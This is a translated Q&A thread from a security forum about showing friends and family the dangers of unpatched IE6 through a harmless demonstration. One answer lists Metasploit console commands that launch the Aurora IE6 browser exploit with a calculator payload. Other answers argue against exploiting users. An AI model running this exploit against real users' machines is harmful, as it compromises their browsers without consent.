URL del sitio web para señalar a los usuarios con el fin de "hacer un punto" sobre la seguridad [cerrado]

Navega tus respuestas
3

Es 'conocimiento común' que los navegadores y sistemas operativos antiguos y sin parches son peligrosos, pero cuando les digo a las personas que no deben hacer sus operaciones bancarias en línea en IE 6 en un paquete de servicio pirateado de XP, nadie escucha. ¿Hay alguna URL de sitio web a la que pueda señalarle personas que demuestre un 'ataque' pero que realmente no haga daño? Estoy buscando algo para asustarlos en un mejor navegador o un sistema operativo con licencia. Para las personas que no me importan, daré un enlace a http://their-name.nimp.org , ¡pero no quiero hacer eso a las personas con las que tendré que tratar más adelante! Esto es algo que haría mientras estoy en casa con ellos (amigos y familiares) para educarlos, no una página a la que me pueda vincular desde mis propios sitios web.

Tenga en cuenta que no estoy buscando una página que explique los peligros, sino una página que demuestre los peligros.

Estoy buscando algo inocuo, similar a esta fabulosa página que demuestra por qué uno nunca debería copiar y pegar comandos de terminal en su terminal, incluso si entiende el código :

enlace

Mi objetivo es solo mostrar que los ataques son posibles y que realmente ocurren. ¡Piense en esto como dejar que un niño toque una cerilla encendida, para enseñarle a mantenerse alejado de la llama abierta de la cocina con aceite de cocina caliente en la sartén! ¡Sí, lo he hecho con mis hijos y se mantienen alejados de la gama!

    
pregunta dotancohen 02.06.2013 - 16:49
fuente

3 respuestas

5

Si realmente quiere asustarlos sin ningún impacto negativo, aloje internamente una vulnerabilidad de Metasploit en IE 6 en uno de sus sistemas, configure la carga útil en cálculo que abrirá una calculadora cuando se explote su navegador y luego finalice la sesión. Dígales que si alguien puede abrir una calculadora en su máquina sin que ellos lo sepan, es probable que también puedan hacer muchas cosas malas.

Aquí están los pasos: 

msf > use exploit/windows/browser/ms10_002_aurora
msf > set SRVHOST 0.0.0.0
msf > set SRVPORT 80
msf > set URIPATH /
msf > set payload windows/exec
msf > set CMD=calc.exe
msf > exploit
    
respondido por el void_in 02.06.2013 - 20:40
fuente
3

Sé que estás buscando un sitio "asustado" en lugar de un sitio que educa al usuario, pero es una mala idea ... Por razones que @Terry Chia cubre en su respuesta.

Recomendaría la ruta educativa con un posible aspecto de desafío ...

Hay muchos sitios de verificación de seguridad de buena reputación para los navegadores. Desafíe a sus amigos / familiares para que no puedan obtener una calificación de "aprobación" en uno de ellos. Motívalos a demostrar que estás equivocado.

Esta sería una gamificación pobre de la seguridad del navegador.

enlace

    
respondido por el Brian Adkins 02.06.2013 - 17:21
fuente
2

Esta es una muy mala idea. No puedo enfatizar lo estúpida que es esta idea.

¿Desea señalar a sus usuarios un sitio web real que realice un exploit en ellos? Aunque usted dice que no hace daño, ¿quién demonios le va a creer? En primer lugar, está buscando un sitio web de terceros. Incluso si el sitio no realiza nada malicioso hoy, ¿quién puede decir que la carga útil "inofensiva" no se convertirá en algo un poco más dañino en el futuro?

¿También desea asociar su sitio web con algo que explote a sus usuarios? ¿Qué pasará con la reputación de su sitio web si aparece en alguna lista negra?

Por último, IANAL, pero estoy bastante seguro de que estás en un terreno legal inestable aquí ...

    
respondido por el Ayrx 02.06.2013 - 16:53
fuente

Lea otras preguntas en las etiquetas

"No publicar contenido a través de HTTP": ¿qué significa esto exactamente? ¿Es cierto que el uso del cifrado simétrico, si el atacante conoce el texto cifrado, el mensaje original y el algoritmo, significa que puede calcular el secreto?